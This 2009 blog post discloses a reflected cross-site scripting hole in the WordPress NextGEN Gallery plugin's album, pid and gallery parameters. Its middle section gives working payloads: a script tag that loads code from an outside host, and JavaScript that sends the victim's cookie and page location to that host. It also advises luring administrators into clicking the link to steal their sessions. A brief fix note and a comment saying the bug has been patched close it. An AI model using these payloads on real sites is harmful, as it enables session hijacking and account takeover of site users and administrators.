Friday, July 17, 2009

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

Intro

Now I need not tell what actually an XSS is, for that refer to here. To see what I mean check out the links given below. If you are using NextGen wordpress plugin, you are probably infected.

the Vulnerability

The vulnerability on this wordpress plugin is seen in the pid, album, gallery GET variables.

http://www.example.com/wordpress/next-gen-gallery/?album=1&
pid=3&
gallery=2


The GET variables on most sites are printed directly onto the <title> html tag on the pages. So if you try something like
next-gen-gallery/?album=1&pid=3&
gallery=2(XSS HOLE CAN BE HERE)

the Title becomes
<title>Picture 3 &laquo; Album 1 
&laquo; Gallery 2(XSS HOLE CAN BE HERE)
&laquo; Next Gen Gallery &laquo;
xxxxxxxxxxx WordPress Demo</title>


So we can insert our own custom HTML into the get query to include harmless HTML tags and dangerous SCRIPT tags to allow for Cross Site Scripting. Since Wordpress is in PHP, by default the magic_quotes_gpc would be turned on (for older PHP installations) the quotes would be escaped. So the simple tests for XSS like

next-gen-gallery/?album=1&pid=3&
gallery=2<title/><script>alert("hi");</script>

would fail. Since the quotes on the "hi" would appear as \"hi\". However why worry with the quotes when something like this works.

next-gen-gallery/?album=1&pid=3&
gallery=2<title/><script src=http://labs.kitiyo.com/store.php></script>


You can put any arbitrary code on the target file and it would get executed on the website. The following code can be put for stealing the cookie:
(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location='+window.location;
window.location = "URL back to the page";


Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)

I am infected now what to do? (for webmaster)
The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug in should note this and please do the required validation on the GET parameter. Since the parameters are numeric this should not be so hard to apply a
is_numeric
check to the parameters.

Don't Believe? Check out these links (XSS Demo)


Happy hacking ...
Fix the bugs
Cheers....

1 comments:

Arun Prabhakar said...

This issue is fixed by the coder.
Please upgrade the your nextGen gallery.